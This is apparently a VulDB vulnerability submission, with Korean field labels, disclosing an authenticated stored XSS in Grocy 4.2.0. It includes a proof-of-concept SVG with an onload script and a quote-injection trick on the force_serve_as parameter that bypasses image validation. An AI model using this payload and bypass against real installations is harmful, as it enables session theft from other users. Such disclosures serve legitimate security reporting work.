| 제목 | Grocy 4.2.0 Authenticated Stored Cross-Site Scripting via Break of Control |
|---|
| 설명 | When authenticated, an operator can bypass the image validation mechanisms and successfully upload a stored Cross-Site Scripting (XSS) payload within the application. This vulnerability allows the operator to steal other users' sessions by tricking them into clicking the stored link.
PoC>
1. Access the "Recipes" menu;
2. Add a new recipe by clicking on "Add" and fill in the inputs with any values;
3. After adding, an "Edit recipe" page will open. On this page, under the "Picture" section, upload a file containing the following content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<defs><font id="x"><font-face font-family="y"/></font></defs>
</svg>
4. When you review the Burp history, you will find a request like this after uploading the SVG file:
GET /api/files/recipepictures/(base64...)?force_serve_as=picture&best_fit_width=400
The response to this request is an error indicating that the image is not valid:
404 Not Found - {"error_message":"Unsupported image type"}
5. Manipulate the "force_serve_as=picture" parameter to: "force_serve_as=picture' ". The single quote breaks the parameter, allowing you to bypass the validation.
6. By copying the URL> http://localhost:9283/api/files/recipepictures/(base64)?force_serve_as=picture'&best_fit_width=400, you can successfully trigger the stored Cross-Site Scripting (XSS) attack.
|
|---|
| 원천 | ⚠️ https://github.com/grocy/grocy |
|---|
| 사용자 | Stux (UID 40142) |
|---|
| 제출 | 2024. 08. 31. PM 08:26 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 09. 01. PM 03:42 (19 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 276274 [Grocy 까지 4.2.0 SVG File Upload recipepictures force_serve_as 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|